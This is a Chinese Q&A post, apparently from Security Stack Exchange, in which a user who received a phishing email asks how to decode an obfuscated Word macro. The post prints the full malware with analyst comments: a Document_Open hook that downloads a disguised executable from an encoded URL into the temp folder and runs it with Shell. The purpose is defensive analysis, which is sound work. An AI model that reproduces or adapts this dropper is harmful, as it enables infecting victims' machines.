我收到了一封恶意电子邮件,我正在试图找出恶意代码的作用。
我已设法通过解码 Chr() 值找到了有效负载,但其余代码仍然无法看懂:
'xsWChLNzlXVGlYZFbEhKDOzjNBrFZHSIl
'DpcvleMuqWiFyl
'hyaTdAKzoQinNr
#If VBA7 Then
' Analyst note: every Declare in both branches is given the same five-argument shape
' (Long, String, String, Long, Long). That shape is URLDownloadToFileA's
' (caller, URL, file name, reserved, callback); the kernel32 aliases
' (GetNumaNodeProcessorMask, WriteStateContainerValue, CreateDirectoryExA, GetTickCount64, ...)
' do not have it, and none of them is called anywhere in this module -- they are decoys
' that only pad the import list. The one imported routine actually used is
' VQBzUNhAGAtJOoF = urlmon!URLDownloadToFileA, invoked from hbnTqBUKPuGRJiqWZCx.
' Parameter names are reused as identifiers elsewhere (e.g. DBjnUFZaqAWuPymnej is also the
' name of the StrReverse helper below); inside a Declare they are local and harmless.
' The Lib / Alias names appear unquoted in this listing; in VBA they must be string
' literals, so the quotes were presumably stripped when the sample was pasted -- confirm
' against the original document.
Private Declare PtrSafe Function GZwSeWZyIhNenjnZ Lib kernel32 Alias GetNumaNodeProcessorMask (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJLMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function elVYixgTcfwsAmLJ Lib kernel32 Alias WriteStateContainerValue (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function oclNInPDShbETYbn Lib kernel32 Alias CreateDirectoryExA (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function MoJTLPWYmfKTgbz Lib kernel32 Alias GetConsoleHistoryInfo (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal lzYSEXffcfoThUb As String, ByVal elVYixgTcfwsAmLJDBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZelVYixgTcfwsAmLJ As Long) As Long
Private Declare PtrSafe Function MuRvBqzFOoCHiUHOJKw Lib kernel32 Alias GetTickCount64 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function PAOKWMEkbYEoQQFQIb Lib kernel32 Alias FT_Exit24 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function lIpXcxrTzTjpyvtA Lib kernel32 Alias GetProductName (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function JUNdgZxoTRSDKy Lib kernel32 Alias FindCloseChangeNotification (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
' The live import: URLDownloadToFileA from urlmon. Its presence next to an auto-exec
' handler (Document_Open) and Shell is the classic VBA downloader pattern.
Private Declare PtrSafe Function VQBzUNhAGAtJOoF Lib urlmon Alias URLDownloadToFileA (ByVal LGXqVWHEnKiVcwaykFTVOtoYnoTDLwWaNw As Long, ByVal KftlkyaxsIGlyvxXaRq As String, ByVal tEMWFoNKZputSPQzVOtoYnoTDLwWaNw As String, ByVal VOtoYnoTDLwWaNwelVYixgTcfwsAmLJelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJelVYixgTcfwsAmLJVOtoYnoTDLwWaNw As Long) As Long
Private Declare PtrSafe Function EQYZGelqKWNJRcce Lib kernel32 Alias PrivCopyFileExW (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbnelVYixgTcfwsAmLJ As Long) As Long
Private Declare PtrSafe Function iwjgRBIGLZpUNGoGTG Lib kernel32 Alias OfferVirtualMemory (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
#Else
' 32-bit (pre-VBA7) branch: the same eleven aliases without PtrSafe, in a different order
' and with some parameter names shuffled. Functionally identical to the branch above.
Private Declare Function MuRvBqzFOoCHiUHOJKw Lib kernel32 Alias GetTickCount64 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function PAOKWMEkbYEoQQFQIb Lib kernel32 Alias FT_Exit24 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function lIpXcxrTzTjpyvtA Lib kernel32 Alias GetProductName (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function JUNdgZxoTRSDKy Lib kernel32 Alias FindCloseChangeNotification (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function EQYZGelqKWNJRcce Lib kernel32 Alias PrivCopyFileExW (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbnelVYixgTcfwsAmLJ As Long) As Long
Private Declare Function iwjgRBIGLZpUNGoGTG Lib kernel32 Alias OfferVirtualMemory (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function VQBzUNhAGAtJOoF Lib urlmon Alias URLDownloadToFileA (ByVal eaNkjdOHzsdMqQQJj As Long, ByVal elVYixgTcfwsAmLJelVYixgTcfwsAmLJ As String, ByVal hyaTdAKzoQinNr As String, ByVal oclNInPDShbETYbnelVYixgTcfwsAmLJ As Long, ByVal MoJTLPWYmfKTgbzoclNInPDShbETYbn As Long) As Long
Private Declare Function GZwSeWZyIhNenjnZ Lib kernel32 Alias GetNumaNodeProcessorMask (ByVal lzYSEXffcfoThUb As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJLMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJoclNInPDShbETYbn As Long) As Long
Private Declare Function elVYixgTcfwsAmLJ Lib kernel32 Alias WriteStateContainerValue (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function oclNInPDShbETYbn Lib kernel32 Alias CreateDirectoryExA (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function MoJTLPWYmfKTgbz Lib kernel32 Alias GetConsoleHistoryInfo (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal lzYSEXffcfoThUb As String, ByVal elVYixgTcfwsAmLJDBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZelVYixgTcfwsAmLJ As Long) As Long
#End If
Function tyfevPUzZSHNUpjYGZwSeWZyIhNenjnZelVYixgTcfwsAmLJ(ByVal AEbtrIvLZRPbVNZDkwQiwTpwOOdeofW As Integer)
' Analyst note: dead decoy. Nothing in this module calls it, the parameter is unused,
' no Dim for either identifier below is visible in the listing, and the If body holds
' only a comment. GZwSeWZyIhNenjnZtyfevPUzZSHNUpjY near the end of the module is a
' byte-for-byte copy with a different name.
kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY
If kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY Then
'GZwSeWZyIhNenjnZoclNInPDShbETYbn=MoJTLPWYmfKTgbz
End If
End Function
Function hbnTqBUKPuGRJiqWZCx(ByVal AEbtrIvLZRPbVNfgVj As String, ByVal hUfrAbrdnkOdGp As String)
' Download wrapper. AEbtrIvLZRPbVNfgVj is the URL and hUfrAbrdnkOdGp the destination path;
' the fetch is done through VQBzUNhAGAtJOoF = urlmon!URLDownloadToFileA. Called once,
' from VOtoYnoTDLwWaNw. No explicit return value and the API result is never checked.
' Filler: none of the three names in this If block is assigned anywhere visible.
If PSUWksxjZPfDYLXwvxT = rMDsWrTugbpcOBHF Then
PYcyaTaPAZYqaEfo = ZPrnJJzqaCCtqvTbUx
'cbxeKGrLfUwXefANSyFxsWChLNzlXVGlYZZPrnJJzqaCCtqvTbUx
ZPrnJJzqaCCtqvTbUx = PSUWksxjZPfDYLXwvxT
End If
' The arithmetic arguments all fold to 0: pCaller = 0, dwReserved = 0, lpfnCB = 0.
' So this is URLDownloadToFileA(0, url, path, 0, 0) with the constants split to defeat
' naive string/keyword matching.
VQBzUNhAGAtJOoF 4 - 2 - 2 + 0 + 0, AEbtrIvLZRPbVNfgVj, hUfrAbrdnkOdGp, -4 + 4 + 100 - 100, 0 + 2 - 2
' Filler assignment.
kulqYfDfxsawQDJKs = tyfevPUzZSHNUpjY
End Function
'Dim GwBumCCwetkuJxFBCpItkYuBQhYPrTgw as Boolean
Private Sub VOtoYnoTDLwWaNw()
' Dropper body, reached from Document_Open. Sequence: build the download URL, build a
' file path under the user's temp directory, download to it, then run it with Shell.
' Every If block and most bare assignments in between are filler that compares or
' copies names never set anywhere visible; they exist only to bulk up the code.
iCQYbaBRKwhBnk = lhkiLXZpbeIyqeoYYT
' URL: a Chr() sequence written backwards, then flipped by DBjnUFZaqAWuPymnej (StrReverse).
' The first four terms are "exe.", so the reversed result ends in ".exe". The Chr(Asc(w)),
' Chr(Asc(l)), Chr(Asc()) ... terms appear without quotes in this listing; quotes were
' presumably lost when the sample was pasted, so decode the URL from the original
' document in an analysis sandbox rather than from this text.
kblSRXpqDJMxcL = DBjnUFZaqAWuPymnej(Chr(101) + Chr(120) + Chr(101) + Chr(46) + Chr(Asc(w)) + Chr(Asc(l)) + Chr(98) + Chr(100) + Chr(111) + Chr(Asc(c)) + Chr(47) + Chr(116) + Chr(97) + Chr(99) + Chr(46) + Chr(102) + Chr(109) + Chr(Asc(o)) + Chr(Asc(p)) + Chr(46) + Chr(Asc(a)) + Chr(Asc()) + Chr(Asc()) + Chr(Asc()) + Chr(115) + Chr(Asc(p)) + Chr(116) + Chr(116) + Chr(104))
If AEbtrIvLZRPbVN = ZDkwQiwTpwOOdeofW Then
SqgFeQsbOnOMZMke = dhwvEFcKDpsYsyJeZg
lzYSEXffcfoThUb = LMWHPWrDMfeVqPZuwgu
End If
' Local file name: StrReverse of ctsalal (presumably a quoted literal in the original).
ZKsXGJZRFGCfXvXP = DBjnUFZaqAWuPymnej(ctsalal)
If vMtgBnwtQByVtExPHr = rSCIQrDtFvkdcUGB Then
iTWgFywkvRqSPai = ZUqEtJtyPvyDIJuP
End If
' Destination path. Chr(84) + Chr(77) + Chr(80) = "TMP" and Chr(92) = "\", so this is
' Environ$("TMP") & "\" & <reversed name>: the downloaded file lands in the temp folder.
VJtYenETeqAVMuxRbDY = Environ$(Chr(22# + 22# + 22# + 8# + 10#) + Chr(100 - 100 + 4 + 3 + 50 + 20) + Chr(2 - 2 + 100 - 10 - 5 - 5)) + Chr(2 + 10 + 20 + 30 + 30) & ZKsXGJZRFGCfXvXP
If jAINgzIjHHlNyJLBCET = snhxHQABbdQMsDkgL Then
lzYSEXffcfoThUb = LMWHPWrDMfeVqPZuwgu
End If
' Stage 1: URLDownloadToFileA(url, path) via the wrapper. Result is not checked.
hbnTqBUKPuGRJiqWZCx kblSRXpqDJMxcL, VJtYenETeqAVMuxRbDY 'if jAINgzIjHHlNyJLBCET = snhxHQABbdQMsDkgL Then
' Unused declaration (filler).
Dim rSCIQrDtFvkdcUGBVJtYenETeqAVMuxRbDY As Currency
' Stage 2: execute whatever was downloaded. For detection, the observable is the Office
' process spawning a child executable from the temp directory right after a document
' opens; for mitigation, blocking macros in documents from the internet stops this
' chain before Document_Open ever runs.
Call Shell(VJtYenETeqAVMuxRbDY, vbNormalFocus) ' Dim rSCIQrDtFvkdcUGBVJtYenETeqAVMuxRbDY as Integer
' Filler assignment.
QVKciSoAuvfQxE = WIlNjMLmbBEiXU
End Sub
Sub Document_Open()
' Auto-execute entry point: Word runs this when the document is opened with macros
' enabled. It does nothing but hand off to the dropper routine VOtoYnoTDLwWaNw.
' Document_Open + a Declare of URLDownloadToFileA + Shell is the keyword triad that
' VBA triage tools (e.g. oledump.py, mentioned in the question) flag for this pattern.
VOtoYnoTDLwWaNw 'kulqYfDfxsawQDJKstyfevPUzZSHNUpjY
End Sub
Private Function EoUkpEUNnhmSKLKUmtAYNRreSwhjqjV(ByVal FbEhKDOzjNBrFZHSIlEoUkpEUNnhmSKL As String)
' Analyst note: dead decoy. Never called, the parameter is unused, the assignment is
' repeated inside the If, and the Dim declares a variable that is never read.
TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV
If KUmtAYNRreSwhjqjV = EoUkpEUNnhmSKL Then
TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV
Dim FbEhKDOzjNBrFZHSIl As Currency
End If
End Function
Private Sub eIZAqeJRzrTIWdkoMI()
' Analyst note: dead decoy; never called, single filler assignment.
oFxRFuVhRCqIsfBH = MRVXJWcClZWEiZqHHU
End Sub
Private Function DBjnUFZaqAWuPymnej(lJWzsWzeaVgVJGa)
' The module's only real deobfuscation primitive: a thin wrapper around StrReverse.
' Both the download URL and the local file name in VOtoYnoTDLwWaNw are stored backwards
' and pass through here. The If blocks on either side are filler.
If TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV Then
TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV
End If
DBjnUFZaqAWuPymnej = StrReverse(lJWzsWzeaVgVJGa)
If TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV Then
KUmtAYNRreSwhjqjV = EoUkpEUNnhmSKL
End If
End Function
Function GZwSeWZyIhNenjnZtyfevPUzZSHNUpjY(ByVal AEbtrIvLZRPbVNZDkwQiwTpwOOdeofW As Integer)
' Analyst note: dead decoy, identical in body to tyfevPUzZSHNUpjYGZwSeWZyIhNenjnZelVYixgTcfwsAmLJ
' at the top of the module. Never called; the If body is only a comment.
kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY
If kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY Then
'GZwSeWZyIhNenjnZoclNInPDShbETYbn=MoJTLPWYmfKTgbz
End If
End Function
我可以用什么方法来解密/解码下面的代码,以便了解它的作用。
我已经尝试过在这里找到的 oledump.py 脚本,但是没有结果。
突出显示的代码可以在这里看到:http://pastebin.com/YDqk3BbM
发布于 2016-11-19 10:23:17
VQBzUNhAGAtJOoF是URLDownloadToFileA的别名
Environ$(Chr(22# + 22# + 22# + 8# + 10#) + Chr(100 - 100 + 4 + 3 + 50 + 20) + Chr(2 - 2 + 100 - 10 - 5 - 5)) + Chr(2 + 10 + 20 + 30 + 30) 中的三个 Chr() 分别是 Chr(84)、Chr(77)、Chr(80),即 "TMP",末尾的 Chr(92) 是 "\";整个表达式等于 Environ$("TMP") & "\",也就是临时文件夹路径加上反斜杠
通常这类脚本都是一样的:它们从互联网下载一个可执行文件到临时文件夹,然后执行它(使用代码中的 Shell 语句)。
该可执行文件是实际的恶意代码。
https://security.stackexchange.com/questions/143025